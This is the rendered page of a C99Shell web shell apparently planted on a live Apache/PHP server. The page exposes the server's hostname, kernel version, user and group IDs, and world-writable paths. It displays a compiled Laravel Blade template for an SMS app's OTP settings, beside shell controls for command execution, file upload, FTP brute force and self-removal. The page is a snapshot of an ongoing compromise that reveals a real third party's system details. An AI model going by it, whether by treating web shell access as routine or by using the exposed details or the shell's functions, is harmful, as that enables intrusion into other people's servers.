!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/storage/framework/views/   drwxrwxrwx
Free 28.26 GB of 117.98 GB (23.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     aef4136e8e829614305b68c1dbb2c3f5.php (6.73 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $__env->startSection('title'); ?>
        <?php echo e(trans('admin.otp_settings')); ?>

<?php $__env->stopSection(); ?>

<?php $__env->startSection('extra-css'); ?>
    <link rel="stylesheet" href="<?php echo e(asset('plugins/datatables-bs4/css/dataTables.bootstrap4.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('plugins/datatables-responsive/css/responsive.bootstrap4.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('plugins/daterangepicker/daterangepicker.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('plugins/bootstrap-datetimepicker/css/bootstrap-datetimepicker.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('/css/custom_modal.css')); ?>">

    <style>
        .daterangepicker.show-calendar{
            top: 226.391px !important;
        }
        .custom-box-shadow{
            background: #f5f1f1 !important;
        }
    </style>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-12 mt-3">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title">
                            <?php echo e(trans('admin.otp_settings')); ?>

                        </h2>
                        <div class="float-right">
                        </div>
                    </div>

                    <!-- /.card-header -->
                    <div class="card-body table-body">
                        <div class="card pb-4 p-4">
                            <form method="post" role="form" id="otp_form"
                                  action="<?php echo e(route('admin.settings.otp')); ?>" enctype="multipart/form-data">
                                <?php echo csrf_field(); ?>

                                <div class="row pb-4">
                                    <div class="col-md-6">
                                        <label for=""><?php echo e(trans('admin.select_customer')); ?></label>
                                        <select name="customer_id" id="selectCustomer" class="form-control">
                                            <?php if($customers->isNotEmpty()): ?>
                                                <option value=""><?php echo e(trans('--Select Customer--')); ?></option>
                                                <?php $__currentLoopData $customers$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $customer): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                                    <option value="<?php echo e($customer->id); ?>"><?php echo e($customer->email); ?></option>
                                                <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                            <?php else: ?>
                                                <option value="">No Data Available</option>
                                            <?php endif; ?>
                                        </select>
                                    </div>

                                    <div class="col-md-6">
                                        <label for=""><?php echo e(trans('admin.status')); ?></label>
                                        <select name="customer_otp_status" class="form-control" id="">
                                            <option value=""><?php echo e(trans('--Select Status--')); ?></option>
                                            <option value="inactive"><?php echo e(trans('Inactive')); ?></option>
                                            <option value="active"><?php echo e(trans('Active')); ?></option>
                                        </select>
                                    </div>
                                </div>

                                <button type="submit"
                                        class="btn btn-primary"><?php echo app('translator')->get('admin.form.button.submit'); ?></button>
                            </form>
                        </div>

                        <table id="contacts" class="table table-striped table-bordered dt-responsive nowrap">
                            <thead>
                            <tr>
                                <th><?php echo e(trans('admin.name')); ?></th>
                                <th><?php echo e(trans('admin.email')); ?></th>
                                <th><?php echo e(trans('admin.status')); ?></th>
                            </tr>
                            </thead>

                        </table>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>
            <!-- /.col -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->

<?php $__env->stopSection(); ?>

<?php $__env->startSection('extra-scripts'); ?>
    <script src="<?php echo e(asset('plugins/datatables/jquery.dataTables.min.js')); ?>"></script>
    <script src="<?php echo e(asset('plugins/datatables-bs4/js/dataTables.bootstrap4.min.js')); ?>"></script>
    <script src="<?php echo e(asset('plugins/datatables-responsive/js/dataTables.responsive.min.js')); ?>"></script>
    <script src="<?php echo e(asset('plugins/datatables-responsive/js/responsive.bootstrap4.min.js')); ?>"></script>

    <script>
        "use strict";
        $('#contacts').DataTable({
            processing: true,
            serverSide: true,
            responsive:true,
            ajax:'<?php echo e(route('admin.settings.get.all.otp.user')); ?>',

            columns: [
                { "data": "full_name" },
                { "data": "email" },
                { "data": "status" },
            ]
        });

        $('#selectCustomer').select2({
            multiple:false
        })
        $(document).on('change', '#selectCustomer', function(e){
            const customer_id = $(this).val();

            $.ajax({
                type:'GET',
                url:'<?php echo e(route('admin.settings.user.otp.status')); ?>',
                data:{
                    customer_id:customer_id,
                },

                success:function(res){

                    $('select[name=customer_otp_status]').val(res.data).trigger('change')
                    // $('select[name=customer_otp_status]').trigger('change')
                }

            });

        });
    </script>
<?php $__env->stopSection(); ?>


<?php echo $__env->make('layouts.admin'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/test.sms.picotech.app/public_html/resources/views/admin/settings/otp_settings.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--